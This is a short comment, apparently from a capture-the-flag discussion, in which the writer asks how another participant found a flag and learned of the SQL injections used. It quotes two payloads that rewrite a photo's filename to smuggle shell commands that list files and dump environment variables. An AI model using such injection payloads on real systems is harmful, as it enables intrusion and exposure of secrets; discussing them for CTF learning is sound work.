The id 3 is actually a flag. How did you decode it? I just can't find the third flag :(
Also, how did you learn about the SQL injections performed? Mainly:
update photos set filename='* || ls ./files > temp.txt' where id=3; commit; --
and,
update photos set filename='* || env > temp.txt' where id=3; commit; --